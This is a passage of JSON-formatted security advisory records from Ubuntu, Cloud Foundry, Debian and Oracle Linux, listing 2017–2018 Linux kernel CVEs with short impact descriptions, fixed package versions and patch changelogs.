A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-15115)\n\nIt was discovered that the key management subsystem in the Linux kernel did \nnot properly handle NULL payloads with non-zero length values. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-15274)\n\nIt was discovered that the Bluetooth Network Encapsulation Protocol (BNEP) \nimplementation in the Linux kernel did not validate the type of socket \npassed in the BNEPCONNADD ioctl(). A local attacker with the CAP_NET_ADMIN \nprivilege could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2017-15868)\n\nAndrey Konovalov discovered a use-after-free vulnerability in the USB \nserial console driver in the Linux kernel. A physically proximate attacker \ncould use this to cause a denial of service (system crash) or possibly \nexecute arbitrary code. (CVE-2017-16525)\n\nIt was discovered that the netfilter passive OS fingerprinting (xt_osf) \nmodule did not properly perform access control checks. A local attacker \ncould improperly modify the system-wide OS fingerprint list. \n(CVE-2017-17450)\n\nIt was discovered that the HMAC implementation did not validate the state \nof the underlying cryptographic hash algorithm. A local attacker could use \nthis to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-17806)\n\nDenys Fedoryshchenko discovered a use-after-free vulnerability in the \nnetfilter xt_TCPMSS filter of the Linux kernel. A remote attacker could use \nthis to cause a denial of service (system crash). (CVE-2017-18017)\n\nGareth Evans discovered that the shm IPC subsystem in the Linux kernel did \nnot properly restrict mapping page zero. A local privileged attacker could \nuse this to execute arbitrary code. 
(CVE-2017-5669)\n\nIt was discovered that an integer overflow vulnerability existed in the \nIPv6 implementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (infinite loop). (CVE-2017-7542)\n\nTommi Rantala and Brad Spengler discovered that the memory manager in the \nLinux kernel did not properly enforce the CONFIG_STRICT_DEVMEM protection \nmechanism. A local attacker with access to /dev/mem could use this to \nexpose sensitive information or possibly execute arbitrary code. \n(CVE-2017-7889)\n\nMohamed Ghannam discovered a use-after-free vulnerability in the DCCP \nprotocol implementation in the Linux kernel. A local attacker could use \nthis to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-8824)\n\nMohamed Ghannam discovered a null pointer dereference in the RDS (Reliable \nDatagram Sockets) protocol implementation of the Linux kernel. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2018-5333)\n\n\u8303\u9f99\u98de discovered that a race condition existed in loop block device \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2018-5344)\n\nUSN-3524-1 mitigated CVE-2017-5754 (Meltdown) for the amd64 \narchitecture in Ubuntu 14.04 LTS. This update provides the \ncorresponding mitigations for the ppc64el architecture. Original \nadvisory details:\n\nJann Horn discovered that microprocessors utilizing speculative execution \nand indirect branch prediction may allow unauthorized memory reads via \nsidechannel attacks. This flaw is known as Meltdown. A local attacker could \nuse this to expose sensitive information, including kernel memory. 
\n(CVE-2017-5754)", "edition": 5, "modified": "2018-02-23T00:00:00", "published": "2018-02-23T00:00:00", "id": "USN-3583-1", "href": "https://ubuntu.com/security/notices/USN-3583-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:38:09", "bulletinFamily": "unix", "cvelist": ["CVE-2017-15265", "CVE-2018-7755", "CVE-2017-12193", "CVE-2018-6927", "CVE-2018-7757", "CVE-2018-1130", "CVE-2018-3665", "CVE-2018-5750", "CVE-2017-12154", "CVE-2018-5803"], "description": "It was discovered that the nested KVM implementation in the Linux kernel in \nsome situations did not properly prevent second level guests from reading \nand writing the hardware CR8 register. A local attacker in a guest could \nuse this to cause a denial of service (system crash). (CVE-2017-12154)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array \nimplementation in the Linux kernel sometimes did not properly handle adding \na new entry. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2017-12193)\n\nIt was discovered that a race condition existed in the ALSA subsystem of \nthe Linux kernel when creating and deleting a port via ioctl(). A local \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2017-15265)\n\nIt was discovered that a null pointer dereference vulnerability existed in \nthe DCCP protocol implementation in the Linux kernel. A local attacker \ncould use this to cause a denial of service (system crash). (CVE-2018-1130)\n\nJulian Stecklina and Thomas Prescher discovered that FPU register states \n(such as MMX, SSE, and AVX registers) which are lazily restored are \npotentially vulnerable to a side channel attack. A local attacker could use \nthis to expose sensitive information. 
(CVE-2018-3665)\n\nWang Qize discovered that an information disclosure vulnerability existed \nin the SMBus driver for ACPI Embedded Controllers in the Linux kernel. A \nlocal attacker could use this to expose sensitive information (kernel \npointer addresses). (CVE-2018-5750)\n\nIt was discovered that the SCTP Protocol implementation in the Linux kernel \ndid not properly validate userspace provided payload lengths in some \nsituations. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2018-5803)\n\nIt was discovered that an integer overflow error existed in the futex \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash). (CVE-2018-6927)\n\nIt was discovered that an information leak vulnerability existed in the \nfloppy driver in the Linux kernel. A local attacker could use this to \nexpose sensitive information (kernel memory). (CVE-2018-7755)\n\nIt was discovered that a memory leak existed in the SAS driver subsystem of \nthe Linux kernel. A local attacker could use this to cause a denial of \nservice (memory exhaustion). (CVE-2018-7757)", "edition": 5, "modified": "2018-07-02T00:00:00", "published": "2018-07-02T00:00:00", "id": "USN-3698-1", "href": "https://ubuntu.com/security/notices/USN-3698-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:41:49", "bulletinFamily": "unix", "cvelist": ["CVE-2017-15265", "CVE-2018-7755", "CVE-2017-12193", "CVE-2018-6927", "CVE-2018-7757", "CVE-2018-1130", "CVE-2018-3665", "CVE-2018-5750", "CVE-2017-12154", "CVE-2018-5803"], "description": "USN-3698-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 \nLTS. 
This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu \n12.04 ESM.\n\nIt was discovered that the nested KVM implementation in the Linux kernel in \nsome situations did not properly prevent second level guests from reading \nand writing the hardware CR8 register. A local attacker in a guest could \nuse this to cause a denial of service (system crash). (CVE-2017-12154)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array \nimplementation in the Linux kernel sometimes did not properly handle adding \na new entry. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2017-12193)\n\nIt was discovered that a race condition existed in the ALSA subsystem of \nthe Linux kernel when creating and deleting a port via ioctl(). A local \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2017-15265)\n\nIt was discovered that a null pointer dereference vulnerability existed in \nthe DCCP protocol implementation in the Linux kernel. A local attacker \ncould use this to cause a denial of service (system crash). (CVE-2018-1130)\n\nJulian Stecklina and Thomas Prescher discovered that FPU register states \n(such as MMX, SSE, and AVX registers) which are lazily restored are \npotentially vulnerable to a side channel attack. A local attacker could use \nthis to expose sensitive information. (CVE-2018-3665)\n\nWang Qize discovered that an information disclosure vulnerability existed \nin the SMBus driver for ACPI Embedded Controllers in the Linux kernel. A \nlocal attacker could use this to expose sensitive information (kernel \npointer addresses). (CVE-2018-5750)\n\nIt was discovered that the SCTP Protocol implementation in the Linux kernel \ndid not properly validate userspace provided payload lengths in some \nsituations. 
A local attacker could use this to cause a denial of service \n(system crash). (CVE-2018-5803)\n\nIt was discovered that an integer overflow error existed in the futex \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash). (CVE-2018-6927)\n\nIt was discovered that an information leak vulnerability existed in the \nfloppy driver in the Linux kernel. A local attacker could use this to \nexpose sensitive information (kernel memory). (CVE-2018-7755)\n\nIt was discovered that a memory leak existed in the SAS driver subsystem of \nthe Linux kernel. A local attacker could use this to cause a denial of \nservice (memory exhaustion). (CVE-2018-7757)", "edition": 6, "modified": "2018-07-02T00:00:00", "published": "2018-07-02T00:00:00", "id": "USN-3698-2", "href": "https://ubuntu.com/security/notices/USN-3698-2", "title": "Linux kernel (Trusty HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:33:02", "bulletinFamily": "software", "cvelist": ["CVE-2017-14051", "CVE-2017-14489", "CVE-2017-14991", "CVE-2017-9984", "CVE-2017-15537", "CVE-2017-12192", "CVE-2017-9985", "CVE-2017-10911", "CVE-2017-14156", "CVE-2017-14340", "CVE-2017-12153", "CVE-2017-12154"], "description": "# \n\n# Severity\n\nMedium\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nUSN-3469-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.\n\nAnthony Perard discovered that the Xen virtual block driver did not properly initialize some data structures before passing them to user space. A local attacker in a guest VM could use this to expose sensitive information from the host OS or other guest VMs. 
([CVE-2017-10911](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-10911>))\n\nBo Zhang discovered that the netlink wireless configuration interface in the Linux kernel did not properly validate attributes when handling certain requests. A local attacker with the CAP_NET_ADMIN could use this to cause a denial of service (system crash). ([CVE-2017-12153](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-12153>))\n\nIt was discovered that the nested KVM implementation in the Linux kernel in some situations did not properly prevent second level guests from reading and writing the hardware CR8 register. A local attacker in a guest could use this to cause a denial of service (system crash).\n\nIt was discovered that the key management subsystem in the Linux kernel did not properly restrict key reads on negatively instantiated keys. A local attacker could use this to cause a denial of service (system crash). ([CVE-2017-12192](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-12192>))\n\nIt was discovered that an integer overflow existed in the sysfs interface for the QLogic 24xx+ series SCSI driver in the Linux kernel. A local privileged attacker could use this to cause a denial of service (system crash). ([CVE-2017-14051](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14051>))\n\nIt was discovered that the ATI Radeon framebuffer driver in the Linux kernel did not properly initialize a data structure returned to user space. A local attacker could use this to expose sensitive information (kernel memory). ([CVE-2017-14156](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14156>))\n\nDave Chinner discovered that the XFS filesystem did not enforce that the realtime inode flag was settable only on filesystems on a realtime device. A local attacker could use this to cause a denial of service (system crash). 
([CVE-2017-14340](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14340>))\n\nChunYu Wang discovered that the iSCSI transport implementation in the Linux kernel did not properly validate data structures. A local attacker could use this to cause a denial of service (system crash). ([CVE-2017-14489](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14489>))\n\nIt was discovered that the generic SCSI driver in the Linux kernel did not properly initialize data returned to user space in some situations. A local attacker could use this to expose sensitive information (kernel memory). ([CVE-2017-14991](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14991>))\n\nDmitry Vyukov discovered that the Floating Point Unit (fpu) subsystem in the Linux kernel did not properly handle attempts to set reserved bits in a task\u2019s extended state (xstate) area. A local attacker could use this to cause a denial of service (system crash). ([CVE-2017-15537](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-15537>))\n\nPengfei Wang discovered that the Turtle Beach MultiSound audio device driver in the Linux kernel contained race conditions when fetching from the ring-buffer. A local attacker could use this to cause a denial of service (infinite loop). 
([CVE-2017-9984](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-9984>), [CVE-2017-9985](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-9985>))\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * Cloud Foundry BOSH stemcells are vulnerable, including: \n * 3421.x versions prior to 3421.32\n * 3445.x versions prior to 3445.17\n * 3468.x versions prior to 3468.11\n * All other stemcells not listed.\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH stemcells: \n * Upgrade 3421.x versions prior to 3421.32\n * Upgrade 3445.x versions prior to 3445.17\n * Upgrade 3468.x versions prior to 3468.11\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io>).\n\n# References\n\n * [USN-3469-2](<http://www.ubuntu.com/usn/usn-3469-2/>)\n * [CVE-2017-10911](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-10911>)\n * [CVE-2017-12153](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-12153>)\n * [CVE-2017-12192](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-12192>)\n * [CVE-2017-14051](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14051>)\n * [CVE-2017-14156](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14156>)\n * [CVE-2017-14340](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14340>)\n * [CVE-2017-14489](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14489>)\n * [CVE-2017-14991](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14991>)\n * [CVE-2017-15537](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-15537>)\n * [CVE-2017-9984](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-9984>)\n * [CVE-2017-9985](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-9985>)\n * [CVE-2017-12154](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-12154>)\n", "edition": 5, 
"modified": "2017-11-27T00:00:00", "published": "2017-11-27T00:00:00", "id": "CFOUNDRY:14981E32944F89BB69AF2D0158A379F0", "href": "https://www.cloudfoundry.org/blog/usn-3469-2/", "title": "USN-3469-2: Linux kernel (Xenial HWE) vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-10-30T13:25:10", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000380", "CVE-2017-1000111", "CVE-2017-14489", "CVE-2017-12146", "CVE-2017-7518", "CVE-2017-1000252", "CVE-2017-14106", "CVE-2017-14140", "CVE-2017-10661", "CVE-2017-1000251", "CVE-2017-1000112", "CVE-2017-7558", "CVE-2017-14156", "CVE-2017-14340", "CVE-2017-1000370", "CVE-2017-12134", "CVE-2017-12153", "CVE-2017-1000371", "CVE-2017-14497", "CVE-2017-12154", "CVE-2017-11600"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3981-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nSeptember 20, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : linux\nCVE ID : CVE-2017-7518 CVE-2017-7558 CVE-2017-10661 CVE-2017-11600\n CVE-2017-12134 CVE-2017-12146 CVE-2017-12153 CVE-2017-12154\n CVE-2017-14106 CVE-2017-14140 CVE-2017-14156 CVE-2017-14340\n CVE-2017-14489 CVE-2017-14497 CVE-2017-1000111 CVE-2017-1000112\n CVE-2017-1000251 CVE-2017-1000252 CVE-2017-1000370 CVE-2017-1000371\n CVE-2017-1000380\nDebian Bug : 866511 875881\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to privilege escalation, denial of service or information\nleaks.\n\nCVE-2017-7518\n\n Andy Lutomirski discovered that KVM is prone to an incorrect debug\n exception (#DB) error occurring while emulating a syscall\n instruction. 
A process inside a guest can take advantage of this\n flaw for privilege escalation inside a guest.\n\nCVE-2017-7558 (stretch only)\n\n Stefano Brivio of Red Hat discovered that the SCTP subsystem is\n prone to a data leak vulnerability due to an out-of-bounds read\n flaw, allowing to leak up to 100 uninitialized bytes to userspace.\n\nCVE-2017-10661 (jessie only)\n\n Dmitry Vyukov of Google reported that the timerfd facility does\n not properly handle certain concurrent operations on a single file\n descriptor. This allows a local attacker to cause a denial of\n service or potentially execute arbitrary code.\n\nCVE-2017-11600\n\n Bo Zhang reported that the xfrm subsystem does not properly\n validate one of the parameters to a netlink message. Local users\n with the CAP_NET_ADMIN capability can use this to cause a denial\n of service or potentially to execute arbitrary code.\n\nCVE-2017-12134 / #866511 / XSA-229\n\n Jan H. Schoenherr of Amazon discovered that when Linux is running\n in a Xen PV domain on an x86 system, it may incorrectly merge\n block I/O requests. A buggy or malicious guest may trigger this\n bug in dom0 or a PV driver domain, causing a denial of service or\n potentially execution of arbitrary code.\n\n This issue can be mitigated by disabling merges on the underlying\n back-end block devices, e.g.:\n echo 2 > /sys/block/nvme0n1/queue/nomerges\n\nCVE-2017-12146 (stretch only)\n\n Adrian Salido of Google reported a race condition in access to the\n "driver_override" attribute for platform devices in sysfs. If\n unprivileged users are permitted to access this attribute, this\n might allow them to gain privileges.\n\nCVE-2017-12153\n\n bo Zhang reported that the cfg80211 (wifi) subsystem does not\n properly validate the parameters to a netlink message. 
Local users\n with the CAP_NET_ADMIN capability (in any user namespace with a\n wifi device) can use this to cause a denial of service.\n\nCVE-2017-12154\n\n Jim Mattson of Google reported that the KVM implementation for\n Intel x86 processors did not correctly handle certain nested\n hypervisor configurations. A malicious guest (or nested guest in a\n suitable L1 hypervisor) could use this for denial of service.\n\nCVE-2017-14106\n\n Andrey Konovalov discovered that a user-triggerable division by\n zero in the tcp_disconnect() function could result in local denial\n of service.\n\nCVE-2017-14140\n\n Otto Ebeling reported that the move_pages() system call performed\n insufficient validation of the UIDs of the calling and target\n processes, resulting in a partial ASLR bypass. This made it easier\n for local users to exploit vulnerabilities in programs installed\n with the set-UID permission bit set.\n\nCVE-2017-14156\n\n "sohu0106" reported an information leak in the atyfb video driver.\n A local user with access to a framebuffer device handled by this\n driver could use this to obtain sensitive information.\n\nCVE-2017-14340\n\n Richard Wareing discovered that the XFS implementation allows the\n creation of files with the "realtime" flag on a filesystem with no\n realtime device, which can result in a crash (oops). A local user\n with access to an XFS filesystem that does not have a realtime\n device can use this for denial of service.\n\nCVE-2017-14489\n\n ChunYu Wang of Red Hat discovered that the iSCSI subsystem does not\n properly validate the length of a netlink message, leading to\n memory corruption. A local user with permission to manage iSCSI\n devices can use this for denial of service or possibly to execute\n arbitrary code.\n\nCVE-2017-14497 (stretch only)\n\n Benjamin Poirier of SUSE reported that vnet headers are not\n properly handled within the tpacket_rcv() function in the raw\n packet (af_packet) feature. 
A local user with the CAP_NET_RAW\n capability can take advantage of this flaw to cause a denial of\n service (buffer overflow, and disk and memory corruption) or have\n other impact.\n\nCVE-2017-1000111\n\n Andrey Konovalov of Google reported a race condition in the raw\n packet (af_packet) feature. Local users with the CAP_NET_RAW\n capability can use this for denial of service or possibly to\n execute arbitrary code.\n\nCVE-2017-1000112\n\n Andrey Konovalov of Google reported a race condition flaw in the\n UDP Fragmentation Offload (UFO) code. A local user can use this\n flaw for denial of service or possibly to execute arbitrary code.\n\nCVE-2017-1000251 / #875881\n\n Armis Labs discovered that the Bluetooth subsystem does not\n properly validate L2CAP configuration responses, leading to a\n stack buffer overflow. This is one of several vulnerabilities\n dubbed "Blueborne". A nearby attacker can use this to cause a\n denial of service or possibly to execute arbitrary code on a\n system with Bluetooth enabled.\n\nCVE-2017-1000252 (stretch only)\n\n Jan H. Schoenherr of Amazon reported that the KVM implementation\n for Intel x86 processors did not correctly validate interrupt\n injection requests. A local user with permission to use KVM could\n use this for denial of service.\n\nCVE-2017-1000370\n\n The Qualys Research Labs reported that a large argument or\n environment list can result in ASLR bypass for 32-bit PIE binaries.\n\nCVE-2017-1000371\n\n The Qualys Research Labs reported that a large argument\n or environment list can result in a stack/heap clash for 32-bit\n PIE binaries.\n\nCVE-2017-1000380\n\n Alexander Potapenko of Google reported a race condition in the ALSA\n (sound) timer driver, leading to an information leak.
A local user\n with permission to access sound devices could use this to obtain\n sensitive information.\n\nDebian disables unprivileged user namespaces by default, but if they\nare enabled (via the kernel.unprivileged_userns_clone sysctl) then\nCVE-2017-11600, CVE-2017-14497 and CVE-2017-1000111 can be exploited\nby any local user.\n\nFor the oldstable distribution (jessie), these problems have been fixed\nin version 3.16.43-2+deb8u5.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 4.9.30-2+deb9u5.\n\nWe recommend that you upgrade your linux packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 29, "modified": "2017-09-20T21:36:13", "published": "2017-09-20T21:36:13", "id": "DEBIAN:DSA-3981-1:0F636", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00243.html", "title": "[SECURITY] [DSA 3981-1] linux security update", "type": "debian", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-08-12T01:03:06", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176", "CVE-2017-1000380", "CVE-2017-1000111", "CVE-2017-14489", "CVE-2017-7889", "CVE-2017-14106", "CVE-2017-14140", "CVE-2017-10661", "CVE-2017-1000251", "CVE-2017-10911", "CVE-2017-7482", "CVE-2017-14156", "CVE-2017-14340", "CVE-2017-12134", "CVE-2017-12153", "CVE-2017-1000363", "CVE-2017-7542", "CVE-2017-12154", "CVE-2017-11600", "CVE-2017-1000365"], "description": "Package : linux\nVersion : 3.2.93-1\nCVE ID : CVE-2017-7482 CVE-2017-7542 CVE-2017-7889 CVE-2017-10661 \n CVE-2017-10911 CVE-2017-11176 CVE-2017-11600 CVE-2017-12134 \n CVE-2017-12153 CVE-2017-12154 CVE-2017-14106 CVE-2017-14140 \n CVE-2017-14156 CVE-2017-14340 CVE-2017-14489 CVE-2017-1000111 \n CVE-2017-1000251 CVE-2017-1000363 
CVE-2017-1000365\n\t\t CVE-2017-1000380\nDebian Bug : #866511 #875881\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2017-7482\n\n Shi Lei discovered that RxRPC Kerberos 5 ticket handling code does\n not properly verify metadata, leading to information disclosure,\n denial of service or potentially execution of arbitrary code.\n\nCVE-2017-7542\n\n An integer overflow vulnerability in the ip6_find_1stfragopt()\n function was found allowing a local attacker with privileges to open\n raw sockets to cause a denial of service.\n\nCVE-2017-7889\n\n Tommi Rantala and Brad Spengler reported that the mm subsystem does\n not properly enforce the CONFIG_STRICT_DEVMEM protection mechanism,\n allowing a local attacker with access to /dev/mem to obtain\n sensitive information or potentially execute arbitrary code.\n\nCVE-2017-10661\n\n Dmitry Vyukov of Google reported that the timerfd facility does\n not properly handle certain concurrent operations on a single file\n descriptor. This allows a local attacker to cause a denial of\n service or potentially to execute arbitrary code.\n\nCVE-2017-10911 / XSA-216\n\n Anthony Perard of Citrix discovered an information leak flaw in Xen\n blkif response handling, allowing a malicious unprivileged guest to\n obtain sensitive information from the host or other guests.\n\nCVE-2017-11176\n\n It was discovered that the mq_notify() function does not set the\n sock pointer to NULL upon entry into the retry logic. An attacker\n can take advantage of this flaw during a userspace close of a\n Netlink socket to cause a denial of service or potentially cause\n other impact.\n\nCVE-2017-11600\n\n bo Zhang reported that the xfrm subsystem does not properly\n validate one of the parameters to a netlink message. 
Local users\n with the CAP_NET_ADMIN capability can use this to cause a denial\n of service or potentially to execute arbitrary code.\n\nCVE-2017-12134 / #866511 / XSA-229\n\n Jan H. Sch\u00f6nherr of Amazon discovered that when Linux is running\n in a Xen PV domain on an x86 system, it may incorrectly merge\n block I/O requests. A buggy or malicious guest may trigger this\n bug in dom0 or a PV driver domain, causing a denial of service or\n potentially execution of arbitrary code.\n\n This issue can be mitigated by disabling merges on the underlying\n back-end block devices, e.g.:\n echo 2 > /sys/block/nvme0n1/queue/nomerges\n\nCVE-2017-12153\n\n bo Zhang reported that the cfg80211 (wifi) subsystem does not\n properly validate the parameters to a netlink message. Local users\n with the CAP_NET_ADMIN capability on a system with a wifi device\n can use this to cause a denial of service.\n\nCVE-2017-12154\n\n Jim Mattson of Google reported that the KVM implementation for\n Intel x86 processors did not correctly handle certain nested\n hypervisor configurations. A malicious guest (or nested guest in a\n suitable L1 hypervisor) could use this for denial of service.\n\nCVE-2017-14106\n\n Andrey Konovalov of Google reported that a specific sequence of\n operations on a TCP socket could lead to division by zero. A\n local user could use this for denial of service.\n\nCVE-2017-14140\n\n Otto Ebeling reported that the move_pages() system call permitted\n users to discover the memory layout of a set-UID process running\n under their real user-ID. 
This made it easier for local users to\n exploit vulnerabilities in programs installed with the set-UID\n permission bit set.\n\nCVE-2017-14156\n\n "sohu0106" reported an information leak in the atyfb video driver.\n A local user with access to a framebuffer device handled by this\n driver could use this to obtain sensitive information.\n\nCVE-2017-14340\n\n Richard Wareing discovered that the XFS implementation allows the\n creation of files with the "realtime" flag on a filesystem with no\n realtime device, which can result in a crash (oops). A local user\n with access to an XFS filesystem that does not have a realtime\n device can use this for denial of service.\n\nCVE-2017-14489\n\n ChunYu of Red Hat discovered that the iSCSI subsystem does not\n properly validate the length of a netlink message, leading to\n memory corruption. A local user with permission to manage iSCSI\n devices can use this for denial of service or possibly to\n execute arbitrary code.\n\nCVE-2017-1000111\n\n Andrey Konovalov of Google reported a race condition in the\n raw packet (af_packet) feature. Local users with the CAP_NET_RAW\n capability can use this to cause a denial of service or possibly to\n execute arbitrary code.\n\nCVE-2017-1000251 / #875881\n\n Armis Labs discovered that the Bluetooth subsystem does not\n properly validate L2CAP configuration responses, leading to a\n stack buffer overflow. This is one of several vulnerabilities\n dubbed "Blueborne". A nearby attacker can use this to cause a\n denial of service or possibly to execute arbitrary code on a\n system with Bluetooth enabled.\n\nCVE-2017-1000363\n\n Roee Hay reported that the lp driver does not properly bounds-check\n passed arguments. This has no security impact in Debian.\n\nCVE-2017-1000365\n\n It was discovered that argument and environment pointers are not\n properly taken into account by the size restrictions on arguments\n and environmental strings passed through execve().
A local\n attacker can take advantage of this flaw in conjunction with other\n flaws to execute arbitrary code.\n\nCVE-2017-1000380\n\n Alexander Potapenko of Google reported a race condition in the ALSA\n (sound) timer driver, leading to an information leak. A local user\n with permission to access sound devices could use this to obtain\n sensitive information.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n3.2.93-1. This version also includes bug fixes from upstream versions\nup to and including 3.2.93.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n3.16.43-2+deb8u4 or were fixed in an earlier version.\n\nFor Debian 9 "Stretch", these problems have been fixed in version\n4.9.30-2+deb9u4 or were fixed in an earlier version.\n\nWe recommend that you upgrade your linux packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n-- \nBen Hutchings - Debian developer, member of kernel, installer and LTS teams", "edition": 10, "modified": "2017-09-20T17:48:01", "published": "2017-09-20T17:48:01", "id": "DEBIAN:DLA-1099-1:57108", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201709/msg00017.html", "title": "[SECURITY] [DLA 1099-1] linux security update", "type": "debian", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:28", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14489", "CVE-2017-7618", "CVE-2017-14106", "CVE-2017-10661", "CVE-2017-1000112", "CVE-2017-7482", "CVE-2017-7541", "CVE-2017-7542", "CVE-2017-12154"], "description": "[4.1.12-103.9.2]\n- Revert 'drivers/char/mem.c: deny access in open operation when securelevel is set' (Brian Maly) [Orabug: 27037811]\n[4.1.12-103.9.1]\n- xfs: use dedicated log worker wq to avoid deadlock with cil wq (Brian Foster) [Orabug: 27013241] \n- scsi: 
scsi_transport_iscsi: fix the issue that iscsi_if_rx doesn't parse nlmsg properly (Xin Long) [Orabug: 26988633] {CVE-2017-14489}\n- nvme: honor RTD3 Entry Latency for shutdowns (Martin K. Petersen) [Orabug: 26999097] \n- ipv6: avoid overflow of offset in ip6_find_1stfragopt (Sabrina Dubroca) [Orabug: 27013220] {CVE-2017-7542}\n- udp: consistently apply ufo or fragmentation (Willem de Bruijn) [Orabug: 27013227] {CVE-2017-1000112}\n- drivers/char/mem.c: deny access in open operation when securelevel is set (Ethan Zhao) [Orabug: 26943884]\n[4.1.12-103.8.1]\n- tcp: fix tcp_mark_head_lost to check skb len before fragmenting (Neal Cardwell) [Orabug: 26923675] \n- timerfd: Protect the might cancel mechanism proper (Thomas Gleixner) [Orabug: 26899775] {CVE-2017-10661}\n- kvm: nVMX: Don't allow L2 to access the hardware CR8 (Jim Mattson) {CVE-2017-12154} {CVE-2017-12154}\n- brcmfmac: fix possible buffer overflow in brcmf_cfg80211_mgmt_tx() (Tim Tianyang Chen) [Orabug: 26880590] {CVE-2017-7541}\n- crypto: ahash - Fix EINPROGRESS notification callback (Herbert Xu) [Orabug: 26916575] {CVE-2017-7618}\n- ovl: use O_LARGEFILE in ovl_copy_up() (David Howells) [Orabug: 25953280] \n- rxrpc: Fix several cases where a padded len isn't checked in ticket decode (David Howells) [Orabug: 26880508] {CVE-2017-7482} {CVE-2017-7482}\n- tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0 (Wei Wang) [Orabug: 26813385] {CVE-2017-14106}", "edition": 4, "modified": "2017-11-02T00:00:00", "published": "2017-11-02T00:00:00", "id": "ELSA-2017-3635", "href": "http://linux.oracle.com/errata/ELSA-2017-3635.html", "title": "Unbreakable Enterprise kernel security update", "type": 